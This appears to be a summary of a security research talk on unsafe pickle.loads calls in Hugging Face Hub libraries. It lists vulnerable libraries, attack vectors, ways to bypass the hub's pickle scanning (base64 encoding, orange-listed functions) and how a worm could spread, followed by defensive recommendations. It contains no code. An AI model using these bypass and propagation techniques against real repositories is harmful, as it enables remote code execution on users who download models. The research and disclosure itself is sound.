How to Make Hugging Face to Hug Worms: Discovering and Exploiting Unsafe Pickle.loads

Learn how attackers exploit unsafe pickle.loads in Hugging Face Hub libraries, enabling RCE attacks through malicious models. Discover vulnerabilities and prevention methods.

Key takeaways
  • Hugging Face Hub integrates many third-party libraries that use unsafe pickle.loads operations, making them vulnerable to remote code execution (RCE) attacks

  • 58 unsafe pickle loads were discovered across 15 libraries, with 6 confirmed as exploitable

  • Three main security participants identified:

    • Platform maintainers (Hugging Face)
    • Third-party library maintainers
    • End users (potential victims)
  • Key attack vectors:

    • Malicious models uploaded to Hugging Face repositories
    • Configuration file abuse
    • Code reuse to bypass pickle scanning
    • Redirection from frontend to backend repositories
  • Hugging Face’s pickle scanning implementation uses three lists:

    • Blacklist (blocked functions)
    • Whitelist (allowed functions)
    • Orange list (potentially dangerous functions)
  • Current protective measures are insufficient:

    • Base64 encoding can bypass scanning
    • Orange-listed functions can call blacklisted functions
    • Third-party libraries often use raw pickle.loads
  • Worm-like behavior is possible through:

    • Repository name matching
    • Automatic model downloading
    • Victim account reuse
    • Exploitation of default configuration paths
  • Recommendations:

    • Third-party maintainers should avoid raw pickle.loads
    • End users should be cautious when downloading and executing model code
    • Platform needs stronger validation and scanning mechanisms
  • Safe alternatives suggested:

    • Using PyTorch’s torch.load implementation
    • Implementing proper input validation
    • Utilizing safe serialization formats
  • Impact extends beyond individual exploits as the hub serves as central distribution point for AI models and datasets